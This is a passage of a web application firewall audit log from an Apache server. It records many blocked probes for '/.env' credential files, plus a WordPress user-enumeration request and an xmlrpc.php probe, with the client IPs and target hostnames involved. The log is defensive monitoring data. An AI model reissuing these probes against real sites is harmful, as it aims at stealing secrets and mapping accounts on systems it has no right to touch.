[line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745994808529697 832 (- - -) Stopwatch2: 1745994808529697 832; combined=298, p1=260, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3df0b7b-Z-- --f0e37a16-A-- [30/Apr/2025:13:44:00 +0700] aBHGsDsHLQ2TK6eM3ep6HAAAAIY 103.236.140.4 51316 103.236.140.4 8181 --f0e37a16-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0 Accept-Charset: utf-8 --f0e37a16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0e37a16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745995440998331 757 (- - -) Stopwatch2: 1745995440998331 757; combined=303, p1=264, p2=0, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0e37a16-Z-- --b20ce512-A-- [30/Apr/2025:13:49:02 +0700] aBHH3j1td-6YjlnYDRLKwgAAAAk 103.236.140.4 52562 103.236.140.4 8181 --b20ce512-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 Accept-Charset: utf-8 --b20ce512-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b20ce512-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745995742635493 794 (- - -) Stopwatch2: 1745995742635493 794; combined=341, p1=297, p2=0, p3=0, p4=0, p5=44, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b20ce512-Z-- --e80f0276-A-- [30/Apr/2025:13:50:51 +0700] aBHIS9mPDA_SdVd56wA4FgAAANE 103.236.140.4 52982 103.236.140.4 8181 --e80f0276-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3866.0 Safari/537.36 Accept-Charset: utf-8 --e80f0276-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e80f0276-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745995851855529 867 (- - -) Stopwatch2: 1745995851855529 867; combined=386, p1=330, p2=0, p3=0, p4=0, p5=56, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e80f0276-Z-- --2b9f3222-A-- [30/Apr/2025:14:33:32 +0700] aBHSTNmPDA_SdVd56wA60wAAANU 103.236.140.4 34840 103.236.140.4 8181 --2b9f3222-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.144.212.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.144.212.193 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --2b9f3222-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b9f3222-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745998412444353 817 (- - -) Stopwatch2: 1745998412444353 817; combined=324, p1=284, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b9f3222-Z-- --e5a9f70f-A-- [30/Apr/2025:15:08:30 +0700] aBHaftBN0baiHx4WjiaiGwAAAEI 103.236.140.4 43178 103.236.140.4 8181 --e5a9f70f-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 165.22.34.189 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 165.22.34.189 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --e5a9f70f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5a9f70f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746000510965561 815 (- - -) Stopwatch2: 1746000510965561 815; combined=363, p1=325, p2=0, p3=0, p4=0, p5=38, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5a9f70f-Z-- --6b846466-A-- [30/Apr/2025:15:26:31 +0700] aBHet9mPDA_SdVd56wA96wAAAMY 103.236.140.4 47446 103.236.140.4 8181 --6b846466-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 Accept-Charset: utf-8 --6b846466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b846466-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746001591815325 781 (- - -) Stopwatch2: 1746001591815325 781; combined=317, p1=278, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b846466-Z-- --d956cc6a-A-- [30/Apr/2025:16:09:35 +0700] aBHoz9mPDA_SdVd56wBAywAAAMw 103.236.140.4 57498 103.236.140.4 8181 --d956cc6a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.62.87.47 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.62.87.47 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d956cc6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d956cc6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746004175665608 769 (- - -) Stopwatch2: 1746004175665608 769; combined=354, p1=317, p2=0, p3=0, p4=0, p5=36, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d956cc6a-Z-- --0fd6d660-A-- [30/Apr/2025:16:50:03 +0700] aBHyS9BN0baiHx4Wjiam8gAAAEc 103.236.140.4 38782 103.236.140.4 8181 --0fd6d660-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0fd6d660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fd6d660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746006603508402 769 (- - -) Stopwatch2: 1746006603508402 769; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fd6d660-Z-- --b4a1ce5a-A-- [30/Apr/2025:16:50:26 +0700] aBHyYj1td-6YjlnYDRLXWQAAAAE 103.236.140.4 38872 103.236.140.4 8181 --b4a1ce5a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b4a1ce5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4a1ce5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746006626156452 738 (- - -) Stopwatch2: 1746006626156452 738; combined=325, p1=293, p2=0, p3=0, p4=0, p5=32, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4a1ce5a-Z-- --d11b4c06-A-- [30/Apr/2025:17:19:18 +0700] aBH5JtBN0baiHx4WjiaosQAAAFc 103.236.140.4 45602 103.236.140.4 8181 --d11b4c06-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d11b4c06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d11b4c06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746008358770909 831 (- - -) Stopwatch2: 1746008358770909 831; combined=354, p1=313, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d11b4c06-Z-- --f25aa07c-A-- [30/Apr/2025:17:20:05 +0700] aBH5VTsHLQ2TK6eM3eqFswAAAI0 103.236.140.4 45810 103.236.140.4 8181 --f25aa07c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f25aa07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f25aa07c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746008405318868 791 (- - -) Stopwatch2: 1746008405318868 791; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f25aa07c-Z-- --f20f4423-A-- [30/Apr/2025:18:12:05 +0700] aBIFhdmPDA_SdVd56wBHMwAAAMw 103.236.140.4 58196 103.236.140.4 8181 --f20f4423-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f20f4423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f20f4423-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746011525320655 754 (- - -) Stopwatch2: 1746011525320655 754; combined=321, p1=283, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f20f4423-Z-- --c649c62d-A-- [30/Apr/2025:18:23:03 +0700] aBIIF9mPDA_SdVd56wBIPwAAAMY 103.236.140.4 60788 103.236.140.4 8181 --c649c62d-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 164.90.208.56 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 164.90.208.56 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c649c62d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c649c62d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746012183392164 816 (- - -) Stopwatch2: 1746012183392164 816; combined=302, p1=265, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c649c62d-Z-- --837a5663-A-- [30/Apr/2025:19:31:08 +0700] aBIYDNBN0baiHx4Wjia0uAAAAFM 103.236.140.4 58584 103.236.140.4 8181 --837a5663-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.65.18.197 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.65.18.197 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --837a5663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --837a5663-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746016268298955 718 (- - -) Stopwatch2: 1746016268298955 718; combined=296, p1=255, p2=0, p3=0, p4=0, p5=40, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --837a5663-Z-- --c2737049-A-- [30/Apr/2025:19:35:54 +0700] aBIZKj1td-6YjlnYDRLnAQAAABg 103.236.140.4 45722 103.236.140.4 8181 --c2737049-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c2737049-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2737049-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746016554826075 2683 (- - -) Stopwatch2: 1746016554826075 2683; combined=1256, p1=406, p2=824, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2737049-Z-- --4208db7f-A-- [30/Apr/2025:19:36:10 +0700] aBIZOtBN0baiHx4Wjia4YQAAAEo 103.236.140.4 46542 103.236.140.4 8181 --4208db7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.227 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4208db7f-C-- demo.sayHello --4208db7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4208db7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746016570357093 5822 (- - -) Stopwatch2: 1746016570357093 5822; combined=4364, p1=646, p2=3511, p3=26, p4=30, p5=86, sr=111, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4208db7f-Z-- --7a82c55e-A-- [30/Apr/2025:19:39:21 +0700] aBIZ-T1td-6YjlnYDRLqQwAAAAk 103.236.140.4 56922 103.236.140.4 8181 --7a82c55e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 --7a82c55e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a82c55e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746016761004368 689 (- - -) Stopwatch2: 1746016761004368 689; combined=275, p1=233, p2=0, p3=0, p4=0, p5=42, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a82c55e-Z-- --8977db35-A-- [30/Apr/2025:19:39:35 +0700] aBIaBz1td-6YjlnYDRLqlQAAABg 103.236.140.4 57784 103.236.140.4 8181 --8977db35-B-- GET /test/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) --8977db35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8977db35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746016775716861 778 (- - -) Stopwatch2: 1746016775716861 778; combined=351, p1=314, p2=0, p3=0, p4=0, p5=37, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8977db35-Z-- --42947178-A-- [30/Apr/2025:20:10:19 +0700] aBIhO9BN0baiHx4WjibT1QAAAEo 103.236.140.4 44320 103.236.140.4 8181 --42947178-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --42947178-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42947178-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746018619743276 793 (- - -) Stopwatch2: 1746018619743276 793; combined=292, p1=253, p2=0, p3=0, p4=0, p5=39, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42947178-Z-- --e7f43768-A-- [30/Apr/2025:20:13:29 +0700] aBIh-dmPDA_SdVd56wBzwQAAANg 103.236.140.4 54620 103.236.140.4 8181 --e7f43768-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 147.182.149.75 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 147.182.149.75 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e7f43768-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: 